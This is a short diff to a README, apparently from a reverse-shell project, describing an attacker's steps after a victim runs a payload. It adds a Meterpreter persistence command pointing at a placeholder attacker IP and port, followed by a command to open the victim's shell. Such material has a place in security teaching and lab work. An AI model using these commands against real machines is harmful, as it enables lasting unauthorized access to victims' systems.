bigbadcyborg/reverse-shell/README.md

   Once the victim has executed the reverse shell, the attacker will see "Meterpreter session 1 opened."
 Lastly, the
-      attacker enters the following command to enter the shell of the victim:
+      attacker enters the following command to ensure persistence and enter the shell of the victim:

+      $run persistence -p {attacker port} -r {attacker IP}
       $shell